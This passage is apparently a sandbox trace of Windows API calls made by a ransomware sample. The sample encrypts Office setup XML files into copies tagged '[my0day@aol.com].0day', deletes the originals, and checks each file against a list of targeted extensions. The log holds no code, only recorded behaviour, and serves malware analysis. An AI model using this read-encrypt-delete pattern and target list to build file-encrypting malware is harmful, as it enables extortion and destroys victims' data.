dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0039.528] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.528] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.529] GetLastError () returned 0x0 [0039.529] ReadFile (in: hFile=0x1f8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x2488, lpOverlapped=0x0) returned 1 [0039.563] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x2490, lpOverlapped=0x0) returned 1 [0039.564] ReadFile (in: hFile=0x1f8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.564] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.564] SetEndOfFile (hFile=0x1c4) returned 1 [0039.564] CloseHandle (hObject=0x1c4) returned 1 [0039.565] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.565] SetEndOfFile (hFile=0x1f8) returned 1 [0039.565] CloseHandle (hObject=0x1f8) returned 1 [0039.565] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0039.566] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 1 [0039.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.566] lstrlenW (lpString=".doc") returned 4 [0039.566] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.566] lstrlenW (lpString=".docx") returned 5 [0039.566] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.566] lstrlenW (lpString=".pdf") returned 4 [0039.566] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.566] lstrlenW (lpString=".xls") returned 4 [0039.566] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.566] lstrlenW (lpString=".xlsx") returned 5 [0039.566] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.566] lstrlenW (lpString=".ppt") returned 4 [0039.566] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.566] lstrlenW (lpString=".zip") returned 4 [0039.566] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.566] lstrlenW (lpString=".rar") returned 4 [0039.566] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.566] lstrlenW (lpString=".bz2") returned 4 [0039.566] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.566] lstrlenW (lpString=".7z") returned 3 [0039.567] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.567] lstrlenW (lpString=".dbf") returned 4 [0039.567] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.567] lstrlenW (lpString=".1cd") returned 4 [0039.567] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.567] lstrlenW (lpString=".jpg") returned 4 [0039.567] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.567] lstrlenW (lpString=".doc") returned 4 [0039.567] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.567] lstrlenW (lpString=".docx") returned 5 [0039.567] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0039.567] lstrlenW (lpString=".pdf") returned 4 [0039.567] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.567] lstrlenW (lpString=".xls") returned 4 [0039.567] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.567] lstrlenW (lpString=".xlsx") returned 5 [0039.567] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0039.567] lstrlenW (lpString=".ppt") returned 4 [0039.567] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.567] lstrlenW (lpString=".zip") returned 4 [0039.567] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.567] lstrlenW (lpString=".rar") returned 4 [0039.567] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.567] lstrlenW (lpString=".bz2") returned 4 [0039.567] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.567] lstrlenW (lpString=".7z") returned 3 [0039.568] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.568] lstrlenW (lpString=".dbf") returned 4 [0039.568] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.568] lstrlenW (lpString=".1cd") returned 4 [0039.568] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102 [0039.568] lstrlenW (lpString=".jpg") returned 4 [0039.568] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.568] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0039.568] lstrlenW (lpString="SETUP.XML") returned 9 [0039.568] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0039.774] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2362) returned 1 [0039.774] CloseHandle (hObject=0x170) returned 1 [0039.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 0x20 [0039.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0039.774] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.774] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0040.077] GetLastError () returned 0x0 [0040.077] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x93a, lpOverlapped=0x0) returned 1 [0040.148] WriteFile (in: hFile=0x1f4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x940, lpOverlapped=0x0) returned 1 [0040.149] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.149] WriteFile (in: hFile=0x1f4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.149] SetEndOfFile (hFile=0x1f4) returned 1 [0040.149] CloseHandle (hObject=0x1f4) returned 1 [0040.150] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.150] SetEndOfFile (hFile=0x170) returned 1 [0040.151] CloseHandle (hObject=0x170) returned 1 [0040.151] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.151] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 1 [0040.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.151] lstrlenW (lpString=".doc") returned 4 [0040.151] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.151] lstrlenW (lpString=".docx") returned 5 [0040.151] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.151] lstrlenW (lpString=".pdf") returned 4 [0040.151] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.151] lstrlenW (lpString=".xls") returned 4 [0040.151] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.151] lstrlenW (lpString=".xlsx") returned 5 [0040.151] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.151] lstrlenW (lpString=".ppt") returned 4 [0040.151] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.152] lstrlenW (lpString=".zip") returned 4 [0040.152] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.152] lstrlenW (lpString=".rar") returned 4 [0040.152] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.152] lstrlenW (lpString=".bz2") returned 4 [0040.152] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.152] lstrlenW (lpString=".7z") returned 3 [0040.152] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.152] lstrlenW (lpString=".dbf") returned 4 [0040.152] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.152] lstrlenW (lpString=".1cd") returned 4 [0040.152] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.152] lstrlenW (lpString=".jpg") returned 4 [0040.152] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.152] lstrlenW (lpString=".doc") returned 4 [0040.152] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.152] lstrlenW (lpString=".docx") returned 5 [0040.152] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.152] lstrlenW (lpString=".pdf") returned 4 [0040.152] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.152] lstrlenW (lpString=".xls") returned 4 [0040.152] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.152] lstrlenW (lpString=".xlsx") returned 5 [0040.152] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.152] lstrlenW (lpString=".ppt") returned 4 [0040.152] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.152] lstrlenW (lpString=".zip") returned 4 [0040.153] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.153] lstrlenW (lpString=".rar") returned 4 [0040.153] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.153] lstrlenW (lpString=".bz2") returned 4 [0040.153] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.153] lstrlenW (lpString=".7z") returned 3 [0040.153] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.153] lstrlenW (lpString=".dbf") returned 4 [0040.153] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.153] lstrlenW (lpString=".1cd") returned 4 [0040.153] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.153] lstrlenW (lpString=".jpg") returned 4 [0040.153] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.153] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.153] lstrlenW (lpString="Proof.XML") returned 9 [0040.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0040.154] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1347) returned 1 [0040.154] CloseHandle (hObject=0x170) returned 1 [0040.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 0x20 [0040.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0040.154] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.154] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0040.154] GetLastError () returned 0x0 [0040.154] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x543, lpOverlapped=0x0) returned 1 [0040.190] WriteFile (in: hFile=0x1f4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x550, lpOverlapped=0x0) returned 1 [0040.191] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.191] WriteFile (in: hFile=0x1f4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.191] SetEndOfFile (hFile=0x1f4) returned 1 [0040.191] CloseHandle (hObject=0x1f4) returned 1 [0040.191] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.191] SetEndOfFile (hFile=0x170) returned 1 [0040.192] CloseHandle (hObject=0x170) returned 1 [0040.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.192] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 1 [0040.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.193] lstrlenW (lpString=".doc") returned 4 [0040.193] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.193] lstrlenW (lpString=".docx") returned 5 [0040.193] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.193] lstrlenW (lpString=".pdf") returned 4 [0040.193] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.193] lstrlenW (lpString=".xls") returned 4 [0040.193] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.193] lstrlenW (lpString=".xlsx") returned 5 [0040.193] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.193] lstrlenW (lpString=".ppt") returned 4 [0040.193] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.193] lstrlenW (lpString=".zip") returned 4 [0040.193] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.193] lstrlenW (lpString=".rar") returned 4 [0040.193] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.193] lstrlenW (lpString=".bz2") returned 4 [0040.193] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.193] lstrlenW (lpString=".7z") returned 3 [0040.193] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.193] lstrlenW (lpString=".dbf") returned 4 [0040.193] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.193] lstrlenW (lpString=".1cd") returned 4 [0040.193] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.193] lstrlenW (lpString=".jpg") returned 4 [0040.193] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.193] lstrlenW (lpString=".doc") returned 4 [0040.194] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.194] lstrlenW (lpString=".docx") returned 5 [0040.194] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0040.194] lstrlenW (lpString=".pdf") returned 4 [0040.194] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.194] lstrlenW (lpString=".xls") returned 4 [0040.194] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.194] lstrlenW (lpString=".xlsx") returned 5 [0040.194] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0040.194] lstrlenW (lpString=".ppt") returned 4 [0040.194] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.194] lstrlenW (lpString=".zip") returned 4 [0040.194] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.194] lstrlenW (lpString=".rar") returned 4 [0040.194] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.194] lstrlenW (lpString=".bz2") returned 4 [0040.194] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.194] lstrlenW (lpString=".7z") returned 3 [0040.194] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.194] lstrlenW (lpString=".dbf") returned 4 [0040.194] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.194] lstrlenW (lpString=".1cd") returned 4 [0040.194] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0040.194] lstrlenW (lpString=".jpg") returned 4 [0040.194] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.194] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.194] lstrlenW (lpString="Proof.XML") returned 9 [0040.195] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0040.195] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1458) returned 1 [0040.195] CloseHandle (hObject=0x170) returned 1 [0040.195] GetFileAttributesW 